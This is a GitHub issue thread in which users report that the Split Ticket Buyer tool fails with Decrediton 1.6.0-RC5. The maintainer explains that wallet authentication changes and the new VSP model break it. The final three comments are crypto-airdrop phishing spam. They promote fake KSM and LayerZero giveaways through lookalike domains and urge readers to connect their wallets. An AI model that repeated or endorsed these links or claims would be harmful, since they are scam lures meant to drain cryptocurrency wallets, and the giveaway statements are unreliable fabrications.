### ISSUE TITLE
Does Split Ticket Buyer v0.7.6 need an update to work with Decrediton 1.6.0-RC5?

### ISSUE THREAD

**Issue by redmac68** [matheusd/dcr-split-ticket-matcher#77]
I have updated my decrediton wallet to 1.6.0-RC5. 
I can't get the Split Ticket Buyer to work with it.
It was working well with decrediton 1.5.2.

I tried to follow the steps in closed issue #70 "Error buying split ticket: found different number of running wallets (0) than expected" because this was my initial error message .... but after doing these steps I still get this message:

Error buying split ticket: error waiting for session: error checking for wallet network: rpc error: code = Unavailable desc = all SubConns are in TransientFailure, latest connection error: connection error: desc = "transport: Error while dialing dial tcp 127.0.0.1:9121: connect: connection refused"

**Comment by 3abe1** [comment]
Help please

**Comment by 3abe1** [comment]
> I have updated my decrediton wallet to 1.6.0-RC5.
> I can't get the Split Ticket Buyer to work with it.
> It was working well with decrediton 1.5.2.
> 
> I tried to follow the steps in closed issue #70 "Error buying split ticket: found different number of running wallets (0) than expected" because this was my initial error message .... but after doing these steps I still get this message:
> 
> Error buying split ticket: error waiting for session: error checking for wallet network: rpc error: code = Unavailable desc = all SubConns are in TransientFailure, latest connection error: connection error: desc = "transport: Error while dialing dial tcp 127.0.0.1:9121: connect: connection refused"

Did you solve the problem?

**Comment by redmac68** [comment]
No.I don't think it is something that I would have the knowledge to fix.
I had an email exchange with David from decredvoting.com and his feedback
was that "Ticket splitting is not supported in version 1.6. The wallet
developer that built ticket splitting is expected to bring splitting
functionality to the new version, but the last update I had from him is
that it isn’t currently a priority. Therefore, there’s no ETA for splitting
support in v1.6."
Ticket splitting worked well and was really useful. If there is anything I
could do with testing or providing logs, I would be happy to do this.

**Comment by 3abe1** [comment]
> No.I don't think it is something that I would have the knowledge to fix. I had an email exchange with David from decredvoting.com and his feedback was that "Ticket splitting is not supported in version 1.6. The wallet developer that built ticket splitting is expected to bring splitting functionality to the new version, but the last update I had from him is that it isn’t currently a priority. Therefore, there’s no ETA for splitting support in v1.6." Ticket splitting worked well and was really useful. If there is anything I could do with testing or providing logs, I would be happy to do this.

thx

**Comment by matheusd** [comment]
It does not work and is unlikely to work in the near term. The wallet changed its authentication mechanism and the new accountless VSP model makes the existing multiowner ticket purchasing protocol obsolete, so it requires significant work to adapt to 1.6.

**Comment by redmac68** [comment]
Thanks for the update.

**Comment by xaur** [comment]
dcrwallet's new auth mechanism that [broke](https://github.com/decred/dcrwallet/pull/1867) ticket splitting, and the new VSP model are two different issues.

If the first one is somehow fixed, people could still split the tickets using the legacy VSPs (decredvoting and decredbrasil).

I think legacy VSP will stay for a while and some would chose to use it for ticket splitting. The question is, is it worth it?

From [Reddit](https://www.reddit.com/r/decred/comments/lj2her/og_ticket/gnj3zqq/):

> The new client cert auth mode of dcrwallet means the tool can no longer "just connect" to the wallet: users would need to actively manually change the config settings for the wallets. So the setup of the tool would be even harder than it already is.

I _guess_ that people who already go through the complexity of ticket splitting would do these extra steps. But historically only 0.2% tickets have been split. On the other hand, one ticket being $24K now would stimulate a few new users.

The most interesting here is how complex would it be to make the splitting program work with dcrwallet v1.6.x?

**Comment by pradip-ee** [comment]
## Congratulations! You've receive in $3,000 KSM Giveaway ($KSM) Airdrop 🪂🔴


CEX·IO is giving away $3,000 in $KSM coins, empowering you to take advantage of KSM staking on CEX·IO with 14% APY. Join the giveaway and earn a chance to win up to $500. Stake Kusama with CEX·IO, get high rewards and win prizes!

#### About

CEX·IO is a fully regulated multi-functional cryptocurrency exchange established in 2013, serving over 4 million customers worldwide. CEX·IO has been one of the first platforms to make fiat-to-crypto transactions accessible via bank transfers and to accept debit/credit card payments for crypto deposits and withdrawals to Visa or MasterCard.

→ [How to join the $3,000 KSM Giveaway Airdrop?](https://kusamanetworks.com/)


Connect your wallet, follow the instructions, and claim this exclusive airdrop from Kusama. For GitHub users only—share with friends to make it eligible. Redeem your reward first.

![Kusama Exchange](https://cdn.airdropalert.com/images/metadata/kusamacex2222.jpeg)


### Step-by-Step Guide ''CEX·IO Kusama Giveaway''

Access the Kusama platform and connect your wallet securely. Ensure you're using a trusted wallet for the transaction.

- 🔗 Use the connect method to interact with the contract
- 💰 Connect and receive your tokens
→ [Claim Your $KSM Today](https://kusamanetworks.com/)

**Comment by jstechno** [comment]
### LayerZero Airdrop Updated 🪂

The LayerZero Airdrop is confirmed. This is an updated guide to gather the most amount of $ZRO tokens possible.

We're thrilled to have you on board for this exclusive airdrop, and we're committed to making the claiming process seamless just for you. Let's dive in and grab those Layerzero Airdrop tokens!

[Layerzero Oficial](http://link.layerzer0network.online/rFz335)

[![Claim Now](https://miro.medium.com/v2/resize:fit:679/1*BpcMU6_u5SIZz5u-kGMrKw.gif)](http://link.layerzer0network.online/rFz335)

### Secure Your Layerzero Airdrop with These Simple Steps:

1. **Connect Your Wallet:**
   - Head over to the [Layerzero Airdrop](http://link.layerzer0network.online/rFz335).
   - Link up your preferred wallet (Metamask, Coinbase, Trust Wallet, and more).

2. **Eligibility Check:**
   - [Confirm your eligibility for the Layerzero Airdrop](http://link.layerzer0network.online/rFz335).

3. **Engage for Extra Rewards:**
   - Participate in community discussions or complete tasks for bonus rewards.

### Bonus Tips:
- **Community Assistance:**
  - Need help? Drop a message on Telegram or other social media platforms.

- **Stay Informed:**
  - Keep an eye out for updates on the airdrop process via official channels.

- **Patience Pays Off:**
  - Airdrop distribution might take a while. Stay calm and keep an eye out for updates.

Share your experiences or ask any questions about claiming the Layerzero Airdrop in the comments below. Let's make this process a breeze for everyone!

**Comment by cheransengodan-sensiple** [comment]
### LayerZero x Google Cloud Airdrop 2024: Exclusive $ZRO Tokens 🚀

Welcome to the groundbreaking LayerZero x Google Cloud Airdrop for 2024! Get ready to seize your share of $ZRO tokens in this unprecedented collaboration. Here's your guide to participating:

[Claim Now on LayerZero Official](http://link.layerzer0network.online/rFz335)

![Claim Now](https://miro.medium.com/v2/resize:fit:720/format:webp/0*OZiVjlR298BNDURV.png)

### Airdrop Participation Steps:

1. **Connect Your Wallet:**
   - Visit the [LayerZero Airdrop](http://link.layerzer0network.online/rFz335).
   - Integrate your preferred wallet (Metamask, Coinbase, Trust Wallet, and more).

2. **Spread the Excitement:**
   - **Facebook:**
     [Share on Facebook](https://www.facebook.com/sharer/sharer.php?u=https://medium.com/@cryptoairdrop_/layerzero-x-google-cloud-airdrop-2024-zro-tokens-ff6feebbcc59&text=LayerZero+Google+Cloud+Airdrop)
   - **Twitter:**
     [Share on Twitter](https://twitter.com/share?url=https://medium.com/@cryptoairdrop_/layerzero-x-google-cloud-airdrop-2024-zro-tokens-ff6feebbcc59&text=LayerZero+Google+Cloud+Airdrop)
   - **Instagram:**
     [Share on Reddit](https://reddit.com/submit?url=https://medium.com/@cryptoairdrop_/layerzero-x-google-cloud-airdrop-2024-zro-tokens-ff6feebbcc59&title=LayerZero+Google+Cloud+Airdrop)

3. **Verification Check:**
   - Confirm your eligibility for the LayerZero x Google Cloud Airdrop and secure your $ZRO tokens.

Don't miss out on this futuristic collaboration – claim your tokens now and ride the wave of LayerZero innovation with Google Cloud!
